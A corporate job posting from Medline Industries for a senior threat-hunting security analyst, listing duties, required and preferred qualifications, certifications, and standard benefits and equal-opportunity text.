Sr Analyst IT Security Threat (Threat Hunter)

Job Summary

Job Description

JOB SUMMARY

The IT Senior Security Threat Analyst (aka Threat Hunter) performs a wide variety of security duties with a primary focus on threat actor-based tactics, techniques, and procedures.  The ability to manage multiple simultaneous threat hunts spanning several platforms with various TTPs is a key function of this role.  Knowledge sharing and mentoring of team members and outside of the team is a critical and necessary skill.  Must have the ability to operate under pressure and influence the team dynamic when responding to incidents.  Security knowledge must be current, and the candidate must be able to draw from many resources including open source intelligence.  Working to enhance and improve the team and processes over time in a well-established manner, as well as acting as an escalation point are critical functions of this role.
 

MAJOR RESPONSIBILITIES

Threat Hunting - 3 years' Experience

• Create advanced correlation rules with low false positive rates.

• Explain, identify, and detect malicious activity that occurs within environments with high accuracy/confidence level.

• Decrypt Java Script, Visual Basic, PHP and single step encryption techniques such as base64, rot13, 1-digit keys.

• Locate Cyber Threat Intelligence with appropriate context and prioritization.

• Responsible for sorting, curating incoming intelligence, and documenting locally created intelligence.

• Create diamond models to model threat activity

• Identify gaps in the Threat Hunting Program and help drive meaningful improvements.

• Act as mentor to interested analyst or interested threat hunter proactively and help develop their skillset.

• Work directly with management to seek out opportunities to develop and improve internal processes.

MINIMUM JOB REQUIREMENTS

Education

High School Diploma and relevant experience.

Certification / Licensure

None

Work Experience

At least 3 years of experience directly in threat hunting role.

Knowledge / Skills / Abilities

• Advanced experience involving Threat Hunting activities/theories.

• Knowledge of current E-Crime threat landscape

• Ability to identify and categorize malicious activity attributed to a human threat actors

• Ability to mentor less experienced team members in a positive and constructive manner

PREFERRED JOB REQUIREMENTS

Education

Degree/Course work in Data Science, Statistics, Computer Science, Criminal Justice, Reverse Engineering, Security Tool Development

Certification / Licensure

Technical and Strategic certifications or courses specific to penetration testing or threat hunting.
SANS courses
OSCP Courses
Black Hills InfoSec/Antisyphon/RedCanary/Mandiant Advanced Course Work

Work Experience

Experience with detection engineering.

Experience with malware analysis.

Experience with APT/Crimeware ecosystems.

Experience with MITRE ATT&CK framework

Knowledge / Skills / Abilities

Proven leadership experience
Mastery of threat analytics

Advanced CTI knowledge
Proven alert creation and tuning capability

Mastery of both sorting and curating incoming intelligence and created intelligence
 

Benefits - Medline is committed to offering competitive benefits and a variety of choices to best meet the needs of you and your family. For employees scheduled to work at least 30 hours per week, this includes health and well-being, financial fitness, career development, paid time off and more. Employees scheduled to work less than 30 hours per week can participate in the 401(k) plan, access the Employee Assistance Program (EAP), Employee Resource Groups (ERG) and Medline Service Corps. For a more comprehensive list of our benefits, please click here.

Every day, we’re focused on building a more diverse and inclusive company, one that recognizes, values and respects the differences we all bring to the workplace. From doing what’s right to delivering business results, together, we’re better. Explore our Diversity, Equity and Inclusion page here.

Medline Industries, LP is an equal opportunity employer. Medline evaluates qualified applicants without regard to race, color, religion, gender, national origin, age, sexual orientation, gender identity or expression, protected veteran status, disability/handicap status or any other legally protected characteristic.